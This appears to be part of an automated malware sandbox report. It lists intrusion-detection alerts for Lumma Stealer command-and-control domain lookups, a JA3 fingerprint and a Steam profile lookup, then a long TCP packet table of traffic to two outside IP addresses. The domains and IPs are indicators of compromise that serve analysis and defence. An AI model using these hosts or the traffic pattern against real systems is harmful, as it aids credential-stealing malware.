2024-12-16T11:11:23.825631+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.5	56740	1.1.1.1	53	UDP
2024-12-16T11:11:23.825631+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.5	56740	1.1.1.1	53	UDP
2024-12-16T11:11:23.964951+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.5	59627	1.1.1.1	53	UDP
2024-12-16T11:11:23.964951+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.5	59627	1.1.1.1	53	UDP
2024-12-16T11:11:24.105386+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.5	51190	1.1.1.1	53	UDP
2024-12-16T11:11:24.105386+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.5	51190	1.1.1.1	53	UDP
2024-12-16T11:11:25.842083+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50382	104.102.49.254	443	TCP
2024-12-16T11:11:26.637547+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	50382	104.102.49.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 11:03:03.696777105 CET	49772	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:03.817009926 CET	80	49772	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:03.817209005 CET	49772	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:03.817327023 CET	49772	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:03.937304974 CET	80	49772	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:05.156047106 CET	80	49772	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:05.156124115 CET	49772	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:06.687257051 CET	49772	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:06.687644005 CET	49779	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:06.807917118 CET	80	49779	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:06.808063984 CET	49779	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:06.808202028 CET	80	49772	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:06.808270931 CET	49779	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:06.808281898 CET	49772	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:06.928581953 CET	80	49779	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:08.170073986 CET	80	49779	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:08.170312881 CET	49779	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:08.174549103 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:08.295793056 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:08.296150923 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:08.296240091 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:08.416845083 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622318029 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622394085 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622457981 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622493982 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622529030 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622524023 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622562885 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622524023 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622524023 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622601986 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622632980 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622657061 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622657061 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622657061 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622657061 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622670889 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622689009 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622705936 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.622735977 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.622752905 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.742659092 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.742733955 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.742742062 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.742825985 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.746813059 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.746870041 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.814377069 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.814435959 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.814770937 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.814836025 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.818835974 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.818896055 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.818990946 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.818991899 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.827225924 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.827349901 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.827387094 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.827466011 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.835791111 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.835850000 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.835866928 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.835948944 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.844258070 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.844316959 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.844458103 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.844458103 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.852731943 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.852787971 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.852929115 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.852929115 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.860902071 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.860963106 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.861011028 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.861057997 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.869435072 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.869498014 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.869837999 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.869940042 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.877901077 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.877958059 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.877990961 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.878211975 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.886524916 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.886715889 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.886975050 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.887041092 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.894227028 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.894320965 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.894397974 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.894397974 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.934710979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.934827089 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:09.934859991 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:09.934943914 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.006520033 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.006581068 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.006632090 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.006632090 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.007838964 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.007910967 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.007987022 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.008054018 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.012614965 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.012671947 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.012696981 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.012728930 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.017323017 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.017400026 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.017412901 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.017452002 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.022252083 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.022289038 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.022331953 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.022331953 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.026806116 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.026875973 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.026932001 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.026983023 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.031548977 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.031687021 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.031701088 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.031773090 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.036184072 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.036253929 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.036442041 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.036497116 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.040864944 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.040992022 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.041156054 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.041157007 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.045540094 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.045603037 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.045679092 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.045835018 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.050287962 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.050355911 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.050384045 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.050436020 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.055205107 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.055260897 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.055381060 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.055382013 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.059803009 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.059859991 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.059989929 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.059989929 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.064555883 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.064616919 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.064719915 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.064721107 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.068207979 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.068264008 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.068367958 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.068367958 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.071636915 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.071710110 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.071836948 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.071836948 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.075269938 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.075335979 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.075350046 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.075422049 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.079118967 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.079159021 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.079229116 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.079229116 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.082802057 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.082859039 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.082977057 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.082978010 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.086287975 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.086466074 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.086806059 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.086999893 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.089929104 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.089992046 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.090373993 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.090486050 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.093843937 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.093944073 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.093955994 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.094038963 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.198990107 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.199065924 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.199150085 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.199214935 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.200227022 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.200300932 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.200403929 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.200458050 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.203161955 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.203222990 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.203238010 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.203288078 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.206082106 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.206135988 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.206208944 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.206265926 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.208887100 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.208949089 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.209002972 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.209058046 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.211632013 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.211690903 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.211762905 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.211832047 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.214310884 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.214365959 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.214438915 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.214497089 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.216984034 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.217045069 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.217133045 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.217278957 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.219760895 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.219841957 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.219893932 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.219961882 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.222121954 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.222208977 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.222301006 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.222359896 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.224689960 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.224754095 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.224759102 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.224816084 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.227216005 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.227288961 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.227345943 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.227410078 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.229693890 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.229762077 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.229768038 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.229825974 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.232247114 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.232305050 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.232328892 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.232356071 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.234800100 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.234884977 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.234894991 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.234946012 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.237353086 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.237390995 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.237426043 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.237481117 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.239831924 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.239887953 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.239917994 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.239948034 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.242352962 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.242463112 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.242477894 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.242537022 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.244872093 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.244944096 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.244962931 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.245037079 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.247421026 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.247476101 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.247510910 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.247539997 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.250133991 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.250174999 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.250214100 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.250250101 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.252449989 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.252521038 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.252568007 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.252624989 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.254998922 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.255068064 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.255090952 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.255147934 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.257541895 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.257605076 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.257607937 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.257668018 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.260071039 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.260147095 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.260199070 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.260279894 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.262542009 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.262609959 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.262645960 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.262710094 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.265228987 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.265311003 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.265528917 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.265610933 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.267693043 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.267754078 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.267802000 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.267848015 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.270176888 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.270240068 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.270292997 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.270350933 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.272686958 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.272752047 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.272799969 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.272855043 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.275262117 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.275340080 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.275386095 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.275443077 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.277730942 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.277822018 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.277868032 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.277928114 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.280319929 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.280392885 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.280450106 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.280518055 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.282885075 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.282968044 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.283094883 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.283154011 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.285500050 CET	80	49783	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:10.285595894 CET	49783	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:10.285609007 CET	80	49783	31.41.244.11	192.168.2.5
